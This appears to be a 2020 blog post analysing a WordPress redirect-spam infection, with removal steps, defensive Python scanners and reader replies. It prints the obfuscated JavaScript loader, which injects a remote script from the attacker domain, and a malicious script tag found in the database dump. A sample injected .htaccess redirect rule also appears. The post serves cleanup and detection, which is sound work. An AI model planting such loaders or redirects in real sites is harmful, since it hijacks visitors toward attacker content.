MALWARE ANALYSIS REPORT - April 2020

BY: @neddykelly | CREATED: April 11, 2020, 10:42 p.m. | VOTES: 83 | PAYOUT: $0.73

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/LjWPUziv-Cyber20Security20-20Malware20Analysis.png]

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/RiIJeR0E-image.png]

Updated May 2020: the Wordfence blog team published details about the attacker and the compromised sites in May 2020; you can read more here.

As WordPress becomes the popular CMS for most users these days, new hacks keep coming onto the scene. Over the weekend I helped a lady with her websites that had suffered an attack. Here is what I put together, as I couldn't find any documentation about the hack online at the time.

WHAT WAS IT?

REDIRECT SPAM ADVERTISEMENT INJECTION INFECTING LARGE NUMBERS OF WORDPRESS FILES: THEMES, PLUGINS AND THE DATABASE
DRIVE-BY SEO REDIRECT AD INJECTION

Job undertaken for a client: the main site was infected, and other sites on the same shared hosting also became infected.

SCOPE

RESTORED 4 WORDPRESS SITES that were hit by the Fastracks and track statistics payload

REMOVED 3 SITES NO LONGER IN USE

INFECTION INCLUDED A MALICIOUS REDIRECT PAYLOAD INFECTING THE FOLLOWING: WP THEMES, PLUGINS, DATABASE

STEPS FOR REMOVAL

Step 1 - Remove - Search for the following strings, the JavaScript payload and the malicious links

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/x3RvY9Ab-image.png]

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/wFRbCO5F-image.png]

Step 2 - Remove the injected loader below (kept verbatim for identification; comments added)

    // jgfjfghkfdrse423 is a marker variable unique to this injection; the rest builds a script tag
    var jgfjfghkfdrse423 = 1; var d = document; var s = d.createElement('script'); s.type = 'text/javascript'; s.async = true;
    // The loader URL is hidden as char codes; it decodes to https://dest.collectfasttracks.com/a.js
    var pl = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,97,46,106,115); s.src = pl;
    if (document.currentScript) {
        // insert the remote script right before the snippet that is currently running
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }

Found in: slide, xml-hint.js

Step 3 - Remove

Inside the database backup (.SQL): a script tag loading https://dest.collectfasttracks.com/y.js

    <script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'>

Remove the following script code and replace it with nothing.

FILES IN QUESTION - SEARCH FOR:
  y.js
  var
  var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x..
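As an added example (not part of the original post), a small Python scanner that applies Steps 1 to 3 mechanically: it walks a WordPress tree or a directory of .sql dumps, flags the collectfasttracks.com indicators quoted above, and decodes String.fromCharCode(...) sequences so the hidden loader URL shows up in plain text. The sample input is constructed here from the snippets in the post.

```python
import re
from pathlib import Path

# Indicators quoted in the post: the domain the loader pulls from and the
# two script names it requests (a.js from the decoded loader, y.js from the DB).
INDICATORS = ("dest.collectfasttracks.com", "collectfasttracks.com/a.js",
              "collectfasttracks.com/y.js")
# The loader hides its URL as String.fromCharCode(104,116,...); match the codes.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")

def decode_fromcharcode(text):
    """Decode every String.fromCharCode(...) call in text to a plain string."""
    out = []
    for m in FROMCHARCODE.finditer(text):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes))
    return out

def scan_text(text, source="<text>"):
    """Return (source, line_no, reason) for lines that carry an indicator as a
    literal or inside a fromCharCode call that decodes to one."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for ind in INDICATORS:
            if ind in line:
                hits.append((source, n, "literal " + ind))
        for decoded in decode_fromcharcode(line):
            if any(ind in decoded for ind in INDICATORS):
                hits.append((source, n, "fromCharCode -> " + decoded))
    return hits

def scan_tree(root, suffixes=(".php", ".js", ".html", ".sql")):
    """Walk a WordPress install or a directory of .sql dumps and collect hits."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in suffixes:
            hits.extend(scan_text(p.read_text(errors="replace"), str(p)))
    return hits

# Constructed sample: a clean line, the Step 2 loader line, and the y.js tag
# found in the SQL dump.
SAMPLE = """<?php echo 'clean'; ?>
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,100,101,115,116,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,97,46,106,115); s.src=pl;
<script type='text/javascript' src='https://dest.collectfasttracks.com/y.js'>
"""

if __name__ == "__main__":
    for src, n, why in scan_text(SAMPLE, "sample"):
        print(f"{src}:{n}: {why}")
```

Run scan_tree() against a copy of the webroot and the exported database; every hit is a file or table row to clean by hand, as the post's Steps 1 to 3 describe.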

LINKS FOR WORDPRESS TECHNIQUES AND REFERENCE FOR INVESTIGATIONS

wordpress-malware-redirect-hack-cleanup

wordpress-files-hacked-wp-config-php-hack/

removing-malicious-redirects-site

Sucuri - how to clean hacked WordPress websites

ASKWPGIRL -remove-malware-wordpress-site

Areas to inspect on an infected website

Check core WordPress files
Check index.php
Check index.html
Check the .htaccess file
Check theme files
Check header.php (themes folder)
Check footer.php (themes folder)
Check functions.php (themes folder)
Look for an adminer script or any other suspiciously named file, e.g. a file named 'adminer.php'
Locate the backdoor
Check for fake or hidden admin users: go to the wp_users table of the
Check both .js and .json files

Server side - Configuration / HTACCESS

When a site is under attack, these server-side features can be turned against it to harvest clicks for the attacker. Often the .htaccess file is injected with malicious code that redirects users; sometimes it is used to display spam.

[IMAGE: https://files.peakd.com/file/peakd-hive/neddykelly/mDL1nTFF-image.png]
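An added example (not from the original post) of what to look for when inspecting .htaccess: a small Python auditor that lists RewriteRule/Redirect directives whose target is a host other than the site's own, and notes whether they sit behind user-agent or referer conditions, which is the shape of a drive-by SEO redirect. The sample .htaccess and the hostnames are constructed for this example; the attacker domain is a placeholder.

```python
import re
from urllib.parse import urlparse

# Constructed sample .htaccess: the first block is what WordPress itself writes;
# the rules after "# END WordPress" are the kind of injected SEO redirect the
# post describes (the attacker domain is a hypothetical .invalid placeholder).
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC,OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule ^(.*)$ http://ads.example-attacker.invalid/go.php?$1 [R=302,L]
"""
# Conditions keyed on who is visiting or where they came from: the hallmark of a
# redirect that shows crawlers and search visitors a different site.
SEO_COND = re.compile(r"%\{HTTP_(USER_AGENT|REFERER)\}", re.I)

def redirect_target(line):
    """Return the destination token of a RewriteRule/Redirect line, else None."""
    tokens = line.split()
    if len(tokens) >= 3 and tokens[0].lower() == "rewriterule":
        return tokens[2]                      # RewriteRule pattern target [flags]
    if tokens and tokens[0].lower() in ("redirect", "redirectmatch"):
        return tokens[-1]                     # Redirect [status] path URL
    return None

def audit_htaccess(text, site_host):
    """List redirects to a host other than site_host and whether each sits
    behind user-agent/referer conditions."""
    findings, pending_conds = [], []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if line.lower().startswith("rewritecond"):
            pending_conds.append(line)
            continue
        target = redirect_target(line)
        if target is None:
            continue
        url = urlparse(target)
        if url.scheme in ("http", "https") and url.hostname != site_host:
            findings.append({"line": n, "host": url.hostname,
                             "seo_conditioned": any(SEO_COND.search(c) for c in pending_conds)})
        pending_conds = []   # conditions apply only to the rule that follows them
    return findings
```

Call audit_htaccess(open(".htaccess").read(), "your-site-host") on the live file; anything it reports that you did not put there yourself is a candidate for the cleanup above.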

Real-life removal procedure and analysis, written up in April 2020

Ned
Jose

TAGS: [ #cybersecurity ] [ #diyhub ] [ #diy ] [ #cyber ] [ #hacks ] [ #wordpress ]

Replies

@diyhub | April 11, 2020, 11:15 p.m. | Votes: 0

Thanks for sharing your creative and inspirational post on HIVE!

This post got curated by our fellow curator @tibfox and you received a 100% upvote from our non-profit curation service!

Join the official DIYHub community on HIVE and show us more of your amazing work!

@googleclone | May 7, 2020, 5:16 p.m. | Votes: 0

Thanks for including a link to our blog https://secure.wphackedhelp.com/blog/; hope you find it useful. Check back for more in-depth updated posts.

@hivebuzz | May 23, 2020, 5:24 a.m. | Votes: 0

Congratulations @neddykelly! You have completed the following achievement on the Hive blockchain and have been rewarded with new badge(s) :

You distributed more than 8000 upvotes. Your next target is to reach 9000 upvotes.

You can view your badges on your board and compare to others on the Ranking.
If you no longer want to receive notifications, reply to this comment with the word STOP.

Support the HiveBuzz project. Vote for our proposal!

@neddykelly | May 26, 2020, 7:47 a.m. | Votes: 0

Wordfence wrote a report on May 13th 2020. The blog article above was written by myself a few weeks before that, keeping up with zero-day live threats.

@neddykelly | May 26, 2020, 10:50 p.m. | Votes: 0

The article in reference is shown here via the blog team: https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/
